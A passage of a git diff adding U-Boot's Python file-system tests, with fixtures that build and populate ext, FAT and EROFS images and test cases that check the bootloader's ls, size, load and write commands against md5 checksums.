check_ubconfig(u_boot_config, fs_ubtype) + + try: + # 128MiB volume + fs_img = fs_helper.mk_fs(u_boot_config, fs_type, 0x8000000, '128MB') + except: + pytest.skip('Setup failed for filesystem: ' + fs_type) + return + else: + yield [fs_ubtype, fs_img] + call('rm -f %s' % fs_img, shell=True) + +# +# Fixture for unlink test +# +@pytest.fixture() +def fs_obj_unlink(request, u_boot_config): + """Set up a file system to be used in unlink test. + + Args: + request: Pytest request object. + u_boot_config: U-Boot configuration. + + Return: + A fixture for unlink test, i.e. a duplet of file system type and + volume file name. + """ + fs_type = request.param + fs_img = '' + + fs_ubtype = fstype_to_ubname(fs_type) + check_ubconfig(u_boot_config, fs_ubtype) + + mount_dir = u_boot_config.persistent_data_dir + '/mnt' + + try: + + # 128MiB volume + fs_img = fs_helper.mk_fs(u_boot_config, fs_type, 0x8000000, '128MB') + except CalledProcessError as err: + pytest.skip('Creating failed for filesystem: ' + fs_type + '. {}'.format(err)) + return + + try: + check_call('mkdir -p %s' % mount_dir, shell=True) + except CalledProcessError as err: + pytest.skip('Preparing mount folder failed for filesystem: ' + fs_type + '. {}'.format(err)) + call('rm -f %s' % fs_img, shell=True) + return + + try: + # Mount the image so we can populate it. + mount_fs(fs_type, fs_img, mount_dir) + except CalledProcessError as err: + pytest.skip('Mounting to folder failed for filesystem: ' + fs_type + '. {}'.format(err)) + call('rmdir %s' % mount_dir, shell=True) + call('rm -f %s' % fs_img, shell=True) + return + + try: + # Test Case 1 & 3 + check_call('mkdir %s/dir1' % mount_dir, shell=True) + check_call('dd if=/dev/urandom of=%s/dir1/file1 bs=1K count=1' + % mount_dir, shell=True) + check_call('dd if=/dev/urandom of=%s/dir1/file2 bs=1K count=1' + % mount_dir, shell=True) + + # Test Case 2 + check_call('mkdir %s/dir2' % mount_dir, shell=True) + for i in range(0, 20): + check_call('mkdir %s/dir2/0123456789abcdef%02x' + % (mount_dir, i), shell=True) + + # Test Case 4 + check_call('mkdir %s/dir4' % mount_dir, shell=True) + + # Test Case 5, 6 & 7 + check_call('mkdir %s/dir5' % mount_dir, shell=True) + check_call('dd if=/dev/urandom of=%s/dir5/file1 bs=1K count=1' + % mount_dir, shell=True) + + except CalledProcessError: + pytest.skip('Setup failed for filesystem: ' + fs_type) + umount_fs(mount_dir) + return + else: + umount_fs(mount_dir) + yield [fs_ubtype, fs_img] + finally: + call('rmdir %s' % mount_dir, shell=True) + call('rm -f %s' % fs_img, shell=True) + +# +# Fixture for symlink fs test +# +@pytest.fixture() +def fs_obj_symlink(request, u_boot_config): + """Set up a file system to be used in symlink fs test. + + Args: + request: Pytest request object. + u_boot_config: U-Boot configuration. + + Return: + A fixture for basic fs test, i.e. a triplet of file system type, + volume file name and a list of MD5 hashes. + """ + fs_type = request.param + fs_img = '' + + fs_ubtype = fstype_to_ubname(fs_type) + check_ubconfig(u_boot_config, fs_ubtype) + + mount_dir = u_boot_config.persistent_data_dir + '/mnt' + + small_file = mount_dir + '/' + SMALL_FILE + medium_file = mount_dir + '/' + MEDIUM_FILE + + try: + + # 1GiB volume + fs_img = fs_helper.mk_fs(u_boot_config, fs_type, 0x40000000, '1GB') + except CalledProcessError as err: + pytest.skip('Creating failed for filesystem: ' + fs_type + '. {}'.format(err)) + return + + try: + check_call('mkdir -p %s' % mount_dir, shell=True) + except CalledProcessError as err: + pytest.skip('Preparing mount folder failed for filesystem: ' + fs_type + '. {}'.format(err)) + call('rm -f %s' % fs_img, shell=True) + return + + try: + # Mount the image so we can populate it. + mount_fs(fs_type, fs_img, mount_dir) + except CalledProcessError as err: + pytest.skip('Mounting to folder failed for filesystem: ' + fs_type + '. {}'.format(err)) + call('rmdir %s' % mount_dir, shell=True) + call('rm -f %s' % fs_img, shell=True) + return + + try: + # Create a subdirectory. + check_call('mkdir %s/SUBDIR' % mount_dir, shell=True) + + # Create a small file in this image. + check_call('dd if=/dev/urandom of=%s bs=1M count=1' + % small_file, shell=True) + + # Create a medium file in this image. + check_call('dd if=/dev/urandom of=%s bs=10M count=1' + % medium_file, shell=True) + + # Generate the md5sums of reads that we will test against small file + out = check_output( + 'dd if=%s bs=1M skip=0 count=1 2> /dev/null | md5sum' + % small_file, shell=True).decode() + md5val = [out.split()[0]] + out = check_output( + 'dd if=%s bs=10M skip=0 count=1 2> /dev/null | md5sum' + % medium_file, shell=True).decode() + md5val.extend([out.split()[0]]) + + except CalledProcessError: + pytest.skip('Setup failed for filesystem: ' + fs_type) + umount_fs(mount_dir) + return + else: + umount_fs(mount_dir) + yield [fs_ubtype, fs_img, md5val] + finally: + call('rmdir %s' % mount_dir, shell=True) + call('rm -f %s' % fs_img, shell=True) + +# +# Fixture for fat test +# +@pytest.fixture() +def fs_obj_fat(request, u_boot_config): + """Set up a file system to be used in fat test. + + Args: + request: Pytest request object. + u_boot_config: U-Boot configuration. + + Return: + A fixture for fat test, i.e. a duplet of file system type and + volume file name. + """ + + # the maximum size of a FAT12 filesystem resulting in 4084 clusters + MAX_FAT12_SIZE = 261695 * 1024 + + # the minimum size of a FAT16 filesystem that can be created with + # mkfs.vfat resulting in 4087 clusters + MIN_FAT16_SIZE = 8208 * 1024 + + fs_type = request.param + fs_img = '' + + fs_ubtype = fstype_to_ubname(fs_type) + check_ubconfig(u_boot_config, fs_ubtype) + + fs_size = MAX_FAT12_SIZE if fs_type == 'fat12' else MIN_FAT16_SIZE + + try: + # the volume size depends on the filesystem + fs_img = fs_helper.mk_fs(u_boot_config, fs_type, fs_size, f'{fs_size}', 1024) + except: + pytest.skip('Setup failed for filesystem: ' + fs_type) + return + else: + yield [fs_ubtype, fs_img] + call('rm -f %s' % fs_img, shell=True) diff --git a/test/py/tests/test_fs/fstest_defs.py b/test/py/tests/test_fs/fstest_defs.py new file mode 100644 index 00000000000..35b2bb65183 --- /dev/null +++ b/test/py/tests/test_fs/fstest_defs.py @@ -0,0 +1,16 @@ +# SPDX-License-Identifier: GPL-2.0+ + +# $MIN_FILE is the name of the 20KB file in the file system image +MIN_FILE='testfile' + +# $SMALL_FILE is the name of the 1MB file in the file system image +SMALL_FILE='1MB.file' + +# $MEDIUM_FILE is the name of the 10MB file in the file system image +MEDIUM_FILE='10MB.file' + +# $BIG_FILE is the name of the 2.5GB file in the file system image +BIG_FILE='2.5GB.file' + +ADDR=0x01000008 +LENGTH=0x00100000 diff --git a/test/py/tests/test_fs/fstest_helpers.py b/test/py/tests/test_fs/fstest_helpers.py new file mode 100644 index 00000000000..faec2982489 --- /dev/null +++ b/test/py/tests/test_fs/fstest_helpers.py @@ -0,0 +1,13 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2019, Texas Instrument +# Author: JJ Hiblot <jjhiblot@ti.com> +# + +from subprocess import check_call, CalledProcessError + +def assert_fs_integrity(fs_type, fs_img): + try: + if fs_type == 'ext4': + check_call('fsck.ext4 -n -f %s' % fs_img, shell=True) + except CalledProcessError: + raise diff --git a/test/py/tests/test_fs/test_basic.py b/test/py/tests/test_fs/test_basic.py new file mode 100644 index 00000000000..71f3e86fb18 --- /dev/null +++ b/test/py/tests/test_fs/test_basic.py @@ -0,0 +1,292 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2018, Linaro Limited +# Author: Takahiro Akashi <takahiro.akashi@linaro.org> +# +# U-Boot File System:Basic Test + +""" +This test verifies basic read/write operation on file system. +""" + +import pytest +import re +from fstest_defs import * +from fstest_helpers import assert_fs_integrity + +@pytest.mark.boardspec('sandbox') +@pytest.mark.slow +class TestFsBasic(object): + def test_fs1(self, u_boot_console, fs_obj_basic): + """ + Test Case 1 - ls command, listing a root directory and invalid directory + """ + fs_type,fs_img,md5val = fs_obj_basic + with u_boot_console.log.section('Test Case 1a - ls'): + # Test Case 1 - ls + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sls host 0:0' % fs_type]) + assert(re.search('2621440000 *%s' % BIG_FILE, ''.join(output))) + assert(re.search('1048576 *%s' % SMALL_FILE, ''.join(output))) + + with u_boot_console.log.section('Test Case 1b - ls (invalid dir)'): + # In addition, test with a nonexistent directory to see if we crash. + output = u_boot_console.run_command( + '%sls host 0:0 invalid_d' % fs_type) + if fs_type == 'ext4': + assert('Can not find directory' in output) + else: + assert('' == output) + + def test_fs2(self, u_boot_console, fs_obj_basic): + """ + Test Case 2 - size command for a small file + """ + fs_type,fs_img,md5val = fs_obj_basic + with u_boot_console.log.section('Test Case 2a - size (small)'): + # 1MB is 0x0010 0000 + # Test Case 2a - size of small file + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%ssize host 0:0 /%s' % (fs_type, SMALL_FILE), + 'printenv filesize', + 'setenv filesize']) + assert('filesize=100000' in ''.join(output)) + + with u_boot_console.log.section('Test Case 2b - size (/../<file>)'): + # Test Case 2b - size of small file via a path using '..' + output = u_boot_console.run_command_list([ + '%ssize host 0:0 /SUBDIR/../%s' % (fs_type, SMALL_FILE), + 'printenv filesize', + 'setenv filesize']) + assert('filesize=100000' in ''.join(output)) + + def test_fs3(self, u_boot_console, fs_obj_basic): + """ + Test Case 3 - size command for a large file + """ + fs_type,fs_img,md5val = fs_obj_basic + with u_boot_console.log.section('Test Case 3 - size (large)'): + # 2.5GB (1024*1024*2500) is 0x9C40 0000 + # Test Case 3 - size of big file + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%ssize host 0:0 /%s' % (fs_type, BIG_FILE), + 'printenv filesize', + 'setenv filesize']) + assert('filesize=9c400000' in ''.join(output)) + + def test_fs4(self, u_boot_console, fs_obj_basic): + """ + Test Case 4 - load a small file, 1MB + """ + fs_type,fs_img,md5val = fs_obj_basic + with u_boot_console.log.section('Test Case 4 - load (small)'): + # Test Case 4a - Read full 1MB of small file + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, SMALL_FILE), + 'printenv filesize']) + assert('filesize=100000' in ''.join(output)) + + # Test Case 4b - Read full 1MB of small file + output = u_boot_console.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[0] in ''.join(output)) + + def test_fs5(self, u_boot_console, fs_obj_basic): + """ + Test Case 5 - load, reading first 1MB of 3GB file + """ + fs_type,fs_img,md5val = fs_obj_basic + with u_boot_console.log.section('Test Case 5 - load (first 1MB)'): + # Test Case 5a - First 1MB of big file + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s %x 0x0' % (fs_type, ADDR, BIG_FILE, LENGTH), + 'printenv filesize']) + assert('filesize=100000' in ''.join(output)) + + # Test Case 5b - First 1MB of big file + output = u_boot_console.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[1] in ''.join(output)) + + def test_fs6(self, u_boot_console, fs_obj_basic): + """ + Test Case 6 - load, reading last 1MB of 3GB file + """ + fs_type,fs_img,md5val = fs_obj_basic + with u_boot_console.log.section('Test Case 6 - load (last 1MB)'): + # fails for ext as no offset support + # Test Case 6a - Last 1MB of big file + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s %x 0x9c300000' + % (fs_type, ADDR, BIG_FILE, LENGTH), + 'printenv filesize']) + assert('filesize=100000' in ''.join(output)) + + # Test Case 6b - Last 1MB of big file + output = u_boot_console.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[2] in ''.join(output)) + + def test_fs7(self, u_boot_console, fs_obj_basic): + """ + Test Case 7 - load, 1MB from the last 1MB in 2GB + """ + fs_type,fs_img,md5val = fs_obj_basic + with u_boot_console.log.section('Test Case 7 - load (last 1MB in 2GB)'): + # fails for ext as no offset support + # Test Case 7a - One from the last 1MB chunk of 2GB + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s %x 0x7ff00000' + % (fs_type, ADDR, BIG_FILE, LENGTH), + 'printenv filesize']) + assert('filesize=100000' in ''.join(output)) + + # Test Case 7b - One from the last 1MB chunk of 2GB + output = u_boot_console.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[3] in ''.join(output)) + + def test_fs8(self, u_boot_console, fs_obj_basic): + """ + Test Case 8 - load, reading first 1MB in 2GB + """ + fs_type,fs_img,md5val = fs_obj_basic + with u_boot_console.log.section('Test Case 8 - load (first 1MB in 2GB)'): + # fails for ext as no offset support + # Test Case 8a - One from the start 1MB chunk from 2GB + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s %x 0x80000000' + % (fs_type, ADDR, BIG_FILE, LENGTH), + 'printenv filesize']) + assert('filesize=100000' in ''.join(output)) + + # Test Case 8b - One from the start 1MB chunk from 2GB + output = u_boot_console.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[4] in ''.join(output)) + + def test_fs9(self, u_boot_console, fs_obj_basic): + """ + Test Case 9 - load, 1MB crossing 2GB boundary + """ + fs_type,fs_img,md5val = fs_obj_basic + with u_boot_console.log.section('Test Case 9 - load (crossing 2GB boundary)'): + # fails for ext as no offset support + # Test Case 9a - One 1MB chunk crossing the 2GB boundary + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s %x 0x7ff80000' + % (fs_type, ADDR, BIG_FILE, LENGTH), + 'printenv filesize']) + assert('filesize=100000' in ''.join(output)) + + # Test Case 9b - One 1MB chunk crossing the 2GB boundary + output = u_boot_console.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[5] in ''.join(output)) + + def test_fs10(self, u_boot_console, fs_obj_basic): + """ + Test Case 10 - load, reading beyond file end'): + """ + fs_type,fs_img,md5val = fs_obj_basic + with u_boot_console.log.section('Test Case 10 - load (beyond file end)'): + # Generic failure case + # Test Case 10 - 2MB chunk from the last 1MB of big file + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s 0x00200000 0x9c300000' + % (fs_type, ADDR, BIG_FILE), + 'printenv filesize', + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert('filesize=100000' in ''.join(output)) + + def test_fs11(self, u_boot_console, fs_obj_basic): + """ + Test Case 11 - write' + """ + fs_type,fs_img,md5val = fs_obj_basic + with u_boot_console.log.section('Test Case 11 - write'): + # Read 1MB from small file + # Write it back to test the writes + # Test Case 11a - Check that the write succeeded + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, SMALL_FILE), + '%swrite host 0:0 %x /%s.w $filesize' + % (fs_type, ADDR, SMALL_FILE)]) + assert('1048576 bytes written' in ''.join(output)) + + # Test Case 11b - Check md5 of written to is same + # as the one read from + output = u_boot_console.run_command_list([ + '%sload host 0:0 %x /%s.w' % (fs_type, ADDR, SMALL_FILE), + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[0] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_fs12(self, u_boot_console, fs_obj_basic): + """ + Test Case 12 - write to "." directory + """ + fs_type,fs_img,md5val = fs_obj_basic + with u_boot_console.log.section('Test Case 12 - write (".")'): + # Next test case checks writing a file whose dirent + # is the first in the block, which is always true for "." + # The write should fail, but the lookup should work + # Test Case 12 - Check directory traversal + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%swrite host 0:0 %x /. 0x10' % (fs_type, ADDR)]) + assert('Unable to write' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_fs13(self, u_boot_console, fs_obj_basic): + """ + Test Case 13 - write to a file with "/./<filename>" + """ + fs_type,fs_img,md5val = fs_obj_basic + with u_boot_console.log.section('Test Case 13 - write ("./<file>")'): + # Read 1MB from small file + # Write it via "same directory", i.e. "." dirent + # Test Case 13a - Check directory traversal + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, SMALL_FILE), + '%swrite host 0:0 %x /./%s2 $filesize' + % (fs_type, ADDR, SMALL_FILE)]) + assert('1048576 bytes written' in ''.join(output)) + + # Test Case 13b - Check md5 of written to is same + # as the one read from + output = u_boot_console.run_command_list([ + 'mw.b %x 00 100' % ADDR, + '%sload host 0:0 %x /./%s2' % (fs_type, ADDR, SMALL_FILE), + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[0] in ''.join(output)) + + # Test Case 13c - Check md5 of written to is same + # as the one read from + output = u_boot_console.run_command_list([ + 'mw.b %x 00 100' % ADDR, + '%sload host 0:0 %x /%s2' % (fs_type, ADDR, SMALL_FILE), + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[0] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) diff --git a/test/py/tests/test_fs/test_erofs.py b/test/py/tests/test_fs/test_erofs.py new file mode 100644 index 00000000000..87ad8f2d5fd --- /dev/null +++ b/test/py/tests/test_fs/test_erofs.py @@ -0,0 +1,220 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (C) 2022 Huang Jianan <jnhuang95@gmail.com> +# Author: Huang Jianan <jnhuang95@gmail.com> + +import os +import pytest +import shutil +import subprocess + +EROFS_SRC_DIR = 'erofs_src_dir' +EROFS_IMAGE_NAME = 'erofs.img' + +def generate_file(name, size): + """ + Generates a file filled with 'x'. + """ + content = 'x' * size + file = open(name, 'w') + file.write(content) + file.close() + +def make_erofs_image(build_dir): + """ + Makes the EROFS images used for the test. + + The image is generated at build_dir with the following structure: + erofs_src_dir/ + ├── f4096 + ├── f7812 + ├── subdir/ + │  └── subdir-file + ├── symdir -> subdir + └── symfile -> f5096 + """ + root = os.path.join(build_dir, EROFS_SRC_DIR) + os.makedirs(root) + + # 4096: uncompressed file + generate_file(os.path.join(root, 'f4096'), 4096) + + # 7812: Compressed file + generate_file(os.path.join(root, 'f7812'), 7812) + + # sub-directory with a single file inside + subdir_path = os.path.join(root, 'subdir') + os.makedirs(subdir_path) + generate_file(os.path.join(subdir_path, 'subdir-file'), 100) + + # symlink + os.symlink('subdir', os.path.join(root, 'symdir')) + os.symlink('f7812', os.path.join(root, 'symfile')) + + input_path = os.path.join(build_dir, EROFS_SRC_DIR) + output_path = os.path.join(build_dir, EROFS_IMAGE_NAME) + args = ' '.join([output_path, input_path]) + subprocess.run(['mkfs.erofs -zlz4 ' + args], shell=True, check=True, + stdout=subprocess.DEVNULL) + +def clean_erofs_image(build_dir): + """ + Deletes the image and src_dir at build_dir. + """ + path = os.path.join(build_dir, EROFS_SRC_DIR) + shutil.rmtree(path) + image_path = os.path.join(build_dir, EROFS_IMAGE_NAME) + os.remove(image_path) + +def erofs_ls_at_root(u_boot_console): + """ + Test if all the present files and directories were listed. + """ + no_slash = u_boot_console.run_command('erofsls host 0') + slash = u_boot_console.run_command('erofsls host 0 /') + assert no_slash == slash + + expected_lines = ['./', '../', '4096 f4096', '7812 f7812', 'subdir/', + '<SYM> symdir', '<SYM> symfile', '4 file(s), 3 dir(s)'] + + output = u_boot_console.run_command('erofsls host 0') + for line in expected_lines: + assert line in output + +def erofs_ls_at_subdir(u_boot_console): + """ + Test if the path resolution works. + """ + expected_lines = ['./', '../', '100 subdir-file', '1 file(s), 2 dir(s)'] + output = u_boot_console.run_command('erofsls host 0 subdir') + for line in expected_lines: + assert line in output + +def erofs_ls_at_symlink(u_boot_console): + """ + Test if the symbolic link's target resolution works. + """ + output = u_boot_console.run_command('erofsls host 0 symdir') + output_subdir = u_boot_console.run_command('erofsls host 0 subdir') + assert output == output_subdir + + expected_lines = ['./', '../', '100 subdir-file', '1 file(s), 2 dir(s)'] + for line in expected_lines: + assert line in output + +def erofs_ls_at_non_existent_dir(u_boot_console): + """ + Test if the EROFS support will crash when get a nonexistent directory. + """ + out_non_existent = u_boot_console.run_command('erofsls host 0 fff') + out_not_dir = u_boot_console.run_command('erofsls host 0 f1000') + assert out_non_existent == out_not_dir + assert '' in out_non_existent + +def erofs_load_files(u_boot_console, files, sizes, address): + """ + Loads files and asserts their checksums. + """ + build_dir = u_boot_console.config.build_dir + for (file, size) in zip(files, sizes): + out = u_boot_console.run_command('erofsload host 0 {} {}'.format(address, file)) + + # check if the right amount of bytes was read + assert size in out + + # calculate u-boot file's checksum + out = u_boot_console.run_command('md5sum {} {}'.format(address, hex(int(size)))) + u_boot_checksum = out.split()[-1] + + # calculate original file's checksum + original_file_path = os.path.join(build_dir, EROFS_SRC_DIR + '/' + file) + out = subprocess.run(['md5sum ' + original_file_path], shell=True, check=True, + capture_output=True, text=True) + original_checksum = out.stdout.split()[0] + + # compare checksum + assert u_boot_checksum == original_checksum + +def erofs_load_files_at_root(u_boot_console): + """ + Test load file from the root directory. + """ + files = ['f4096', 'f7812'] + sizes = ['4096', '7812'] + address = '$kernel_addr_r' + erofs_load_files(u_boot_console, files, sizes, address) + +def erofs_load_files_at_subdir(u_boot_console): + """ + Test load file from the subdirectory. + """ + files = ['subdir/subdir-file'] + sizes = ['100'] + address = '$kernel_addr_r' + erofs_load_files(u_boot_console, files, sizes, address) + +def erofs_load_files_at_symlink(u_boot_console): + """ + Test load file from the symlink. + """ + files = ['symfile'] + sizes = ['7812'] + address = '$kernel_addr_r' + erofs_load_files(u_boot_console, files, sizes, address) + +def erofs_load_non_existent_file(u_boot_console): + """ + Test if the EROFS support will crash when load a nonexistent file. + """ + address = '$kernel_addr_r' + file = 'non-existent' + out = u_boot_console.run_command('erofsload host 0 {} {}'.format(address, file)) + assert 'Failed to load' in out + +def erofs_run_all_tests(u_boot_console): + """ + Runs all test cases. + """ + erofs_ls_at_root(u_boot_console) + erofs_ls_at_subdir(u_boot_console) + erofs_ls_at_symlink(u_boot_console) + erofs_ls_at_non_existent_dir(u_boot_console) + erofs_load_files_at_root(u_boot_console) + erofs_load_files_at_subdir(u_boot_console) + erofs_load_files_at_symlink(u_boot_console) + erofs_load_non_existent_file(u_boot_console) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_fs_generic') +@pytest.mark.buildconfigspec('cmd_erofs') +@pytest.mark.buildconfigspec('fs_erofs') +@pytest.mark.requiredtool('mkfs.erofs') +@pytest.mark.requiredtool('md5sum') + +def test_erofs(u_boot_console): + """ + Executes the erofs test suite. + """ + build_dir = u_boot_console.config.build_dir + + # If the EFI subsystem is enabled and initialized, EFI subsystem tries to + # add EFI boot option when the new disk is detected. If there is no EFI + # System Partition exists, EFI subsystem outputs error messages and + # it ends up with test failure. + # Restart U-Boot to clear the previous state. + # TODO: Ideally EFI test cases need to be fixed, but it will + # increase the number of system reset. + u_boot_console.restart_uboot() + + try: + # setup test environment + make_erofs_image(build_dir) + image_path = os.path.join(build_dir, EROFS_IMAGE_NAME) + u_boot_console.run_command('host bind 0 {}'.format(image_path)) + # run all tests + erofs_run_all_tests(u_boot_console) + except: + clean_erofs_image(build_dir) + raise AssertionError + + # clean test environment + clean_erofs_image(build_dir) diff --git a/test/py/tests/test_fs/test_ext.py b/test/py/tests/test_fs/test_ext.py new file mode 100644 index 00000000000..05fefa53a0e --- /dev/null +++ b/test/py/tests/test_fs/test_ext.py @@ -0,0 +1,355 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2018, Linaro Limited +# Author: Takahiro Akashi <takahiro.akashi@linaro.org> +# +# U-Boot File System:Exntented Test + +""" +This test verifies extended write operation on file system. +""" + +import os.path +import pytest +import re +from subprocess import check_output +from fstest_defs import * +from fstest_helpers import assert_fs_integrity + +PLAIN_FILE='abcdefgh.txt' +MANGLE_FILE='abcdefghi.txt' + +def str2fat(long_filename): + splitext = os.path.splitext(long_filename.upper()) + name = splitext[0] + ext = splitext[1][1:] + if len(name) > 8: + name = '%s~1' % name[:6] + return '%-8s %s' % (name, ext) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.slow +class TestFsExt(object): + def test_fs_ext1(self, u_boot_console, fs_obj_ext): + """ + Test Case 1 - write a file with absolute path + """ + fs_type,fs_img,md5val = fs_obj_ext + with u_boot_console.log.section('Test Case 1 - write with abs path'): + # Test Case 1a - Check if command successfully returned + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, MIN_FILE), + '%swrite host 0:0 %x /dir1/%s.w1 $filesize' + % (fs_type, ADDR, MIN_FILE)]) + assert('20480 bytes written' in ''.join(output)) + + # Test Case 1b - Check md5 of file content + output = u_boot_console.run_command_list([ + 'mw.b %x 00 100' % ADDR, + '%sload host 0:0 %x /dir1/%s.w1' % (fs_type, ADDR, MIN_FILE), + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[0] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext2(self, u_boot_console, fs_obj_ext): + """ + Test Case 2 - write to a file with relative path + """ + fs_type,fs_img,md5val = fs_obj_ext + with u_boot_console.log.section('Test Case 2 - write with rel path'): + # Test Case 2a - Check if command successfully returned + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, MIN_FILE), + '%swrite host 0:0 %x dir1/%s.w2 $filesize' + % (fs_type, ADDR, MIN_FILE)]) + assert('20480 bytes written' in ''.join(output)) + + # Test Case 2b - Check md5 of file content + output = u_boot_console.run_command_list([ + 'mw.b %x 00 100' % ADDR, + '%sload host 0:0 %x dir1/%s.w2' % (fs_type, ADDR, MIN_FILE), + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[0] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext3(self, u_boot_console, fs_obj_ext): + """ + Test Case 3 - write to a file with invalid path + """ + fs_type,fs_img,md5val = fs_obj_ext + with u_boot_console.log.section('Test Case 3 - write with invalid path'): + # Test Case 3 - Check if command expectedly failed + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, MIN_FILE), + '%swrite host 0:0 %x /dir1/none/%s.w3 $filesize' + % (fs_type, ADDR, MIN_FILE)]) + assert('Unable to write file /dir1/none/' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext4(self, u_boot_console, fs_obj_ext): + """ + Test Case 4 - write at non-zero offset, enlarging file size + """ + fs_type,fs_img,md5val = fs_obj_ext + with u_boot_console.log.section('Test Case 4 - write at non-zero offset, enlarging file size'): + # Test Case 4a - Check if command successfully returned + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, MIN_FILE), + '%swrite host 0:0 %x /dir1/%s.w4 $filesize' + % (fs_type, ADDR, MIN_FILE)]) + output = u_boot_console.run_command( + '%swrite host 0:0 %x /dir1/%s.w4 $filesize 0x1400' + % (fs_type, ADDR, MIN_FILE)) + assert('20480 bytes written' in output) + + # Test Case 4b - Check size of written file + output = u_boot_console.run_command_list([ + '%ssize host 0:0 /dir1/%s.w4' % (fs_type, MIN_FILE), + 'printenv filesize', + 'setenv filesize']) + assert('filesize=6400' in ''.join(output)) + + # Test Case 4c - Check md5 of file content + output = u_boot_console.run_command_list([ + 'mw.b %x 00 100' % ADDR, + '%sload host 0:0 %x /dir1/%s.w4' % (fs_type, ADDR, MIN_FILE), + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[1] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext5(self, u_boot_console, fs_obj_ext): + """ + Test Case 5 - write at non-zero offset, shrinking file size + """ + fs_type,fs_img,md5val = fs_obj_ext + with u_boot_console.log.section('Test Case 5 - write at non-zero offset, shrinking file size'): + # Test Case 5a - Check if command successfully returned + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, MIN_FILE), + '%swrite host 0:0 %x /dir1/%s.w5 $filesize' + % (fs_type, ADDR, MIN_FILE)]) + output = u_boot_console.run_command( + '%swrite host 0:0 %x /dir1/%s.w5 0x1400 0x1400' + % (fs_type, ADDR, MIN_FILE)) + assert('5120 bytes written' in output) + + # Test Case 5b - Check size of written file + output = u_boot_console.run_command_list([ + '%ssize host 0:0 /dir1/%s.w5' % (fs_type, MIN_FILE), + 'printenv filesize', + 'setenv filesize']) + assert('filesize=2800' in ''.join(output)) + + # Test Case 5c - Check md5 of file content + output = u_boot_console.run_command_list([ + 'mw.b %x 00 100' % ADDR, + '%sload host 0:0 %x /dir1/%s.w5' % (fs_type, ADDR, MIN_FILE), + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[2] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext6(self, u_boot_console, fs_obj_ext): + """ + Test Case 6 - write nothing at the start, truncating to zero + """ + fs_type,fs_img,md5val = fs_obj_ext + with u_boot_console.log.section('Test Case 6 - write nothing at the start, truncating to zero'): + # Test Case 6a - Check if command successfully returned + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, MIN_FILE), + '%swrite host 0:0 %x /dir1/%s.w6 $filesize' + % (fs_type, ADDR, MIN_FILE)]) + output = u_boot_console.run_command( + '%swrite host 0:0 %x /dir1/%s.w6 0 0' + % (fs_type, ADDR, MIN_FILE)) + assert('0 bytes written' in output) + + # Test Case 6b - Check size of written file + output = u_boot_console.run_command_list([ + '%ssize host 0:0 /dir1/%s.w6' % (fs_type, MIN_FILE), + 'printenv filesize', + 'setenv filesize']) + 